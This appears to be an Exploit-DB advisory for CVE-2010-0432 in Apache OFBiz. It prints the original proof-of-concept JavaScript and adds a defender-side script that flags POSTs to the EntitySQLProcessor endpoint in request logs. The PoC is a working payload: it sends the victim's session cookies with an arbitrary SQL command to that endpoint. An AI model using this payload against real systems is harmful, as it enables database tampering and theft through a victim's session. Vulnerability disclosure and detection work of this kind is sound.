Vendor: OFBiz
By: Lucas Apa
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: OFBiz
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CVE: CVE-2010-0432
CPE: a:apache:ofbiz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2010

Apache OFBiz SQL Remote Execution PoC Payload

This exploit allows an attacker to execute arbitrary SQL commands on the vulnerable Apache OFBiz application. The exploit is triggered by sending a specially crafted POST request to the EntitySQLProcessor servlet, which contains the malicious SQL command. The malicious command is then executed by the application.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries.

Exploit-DB raw data:

/*

Apache OFBiz SQL Remote Execution PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

*/

var cmd = 'command';

// Obtain an XMLHTTP object: ActiveX on old Internet Explorer, XMLHttpRequest elsewhere.
var xmlhttp = false;
try {
    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
    try {
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (E) {
        xmlhttp = false;
    }
}

if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
    try {
        xmlhttp = new XMLHttpRequest();
    } catch (e) {
        xmlhttp = false;
    }
}
if (!xmlhttp && window.createRequest) {
    try {
        xmlhttp = window.createRequest();
    } catch (e) {
        xmlhttp = false;
    }
}

// POST to the webtools EntitySQLProcessor endpoint.
xmlhttp.open("POST", "https://192.168.225.135:8443/webtools/control/EntitySQLProcessor", true);
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
        //alert(xmlhttp.responseText)
    }
}

// Forward the cookies of the session in which this script runs.
var cookie = unescape(document.cookie);
xmlhttp.setRequestHeader("content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("cookie", cookie);
// The form body is built with E4X XML literals (legacy Firefox syntax).
var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();
var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();
var post_data = str1 + cmd + str2;
xmlhttp.send(post_data);
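
A defender-side check for the request this PoC sends, as an added example that is not part of the original advisory or of OFBiz: it scans HTTP request records for POSTs to the EntitySQLProcessor path that carry a sqlCommand field and reports the decoded SQL. The record shape (src, method, path, body), the function names and the sample records are assumptions constructed for illustration.

```javascript
// Added example: flag POSTs to the OFBiz EntitySQLProcessor endpoint in request logs.
// Assumption: each record is { src, method, path, body } as exported by a proxy or WAF.
const TARGET = '/webtools/control/EntitySQLProcessor';

// Decode an application/x-www-form-urlencoded body into a plain object.
function parseForm(body) {
  const out = {};
  for (const [k, v] of new URLSearchParams(body)) out[k] = v;
  return out;
}

// Classify by the first SQL keyword so read-only queries can be triaged separately.
function classifySql(sql) {
  const m = /^\s*([a-z]+)/i.exec(sql);
  const verb = m ? m[1].toUpperCase() : '';
  if (verb === 'SELECT') return 'read';
  const writes = ['INSERT', 'UPDATE', 'DELETE', 'DROP', 'ALTER', 'CREATE', 'TRUNCATE'];
  return writes.includes(verb) ? 'write' : 'other';
}

// Return one finding per POST to the endpoint that carries a sqlCommand field.
function findSqlProcessorPosts(records) {
  const findings = [];
  for (const r of records) {
    if (r.method !== 'POST') continue;
    // Drop the query string and any ;jsessionid path parameter before comparing.
    const path = r.path.split('?')[0].split(';')[0];
    if (path !== TARGET) continue;
    const form = parseForm(r.body || '');
    if (!('sqlCommand' in form)) continue;
    findings.push({
      src: r.src,
      group: form.group || null,
      sql: form.sqlCommand,
      kind: classifySql(form.sqlCommand),
    });
  }
  return findings;
}

// Constructed sample records (not real traffic).
const SAMPLE = [
  { src: '10.0.0.5', method: 'GET', path: '/webtools/control/main', body: '' },
  { src: '10.0.0.7', method: 'POST', path: '/webtools/control/EntitySQLProcessor',
    body: 'submitButton=Enviar&sqlCommand=SELECT+1&group=org.ofbiz&rowLimit=200' },
  { src: '10.0.0.9', method: 'POST', path: '/webtools/control/EntitySQLProcessor;jsessionid=ABC',
    body: 'sqlCommand=update%20t%20set%20a%3D1&group=org.ofbiz' },
];

console.log(findSqlProcessorPosts(SAMPLE));
```

Access logs that omit request bodies can still be filtered on the method and path alone; the SQL text is only available where the body is captured.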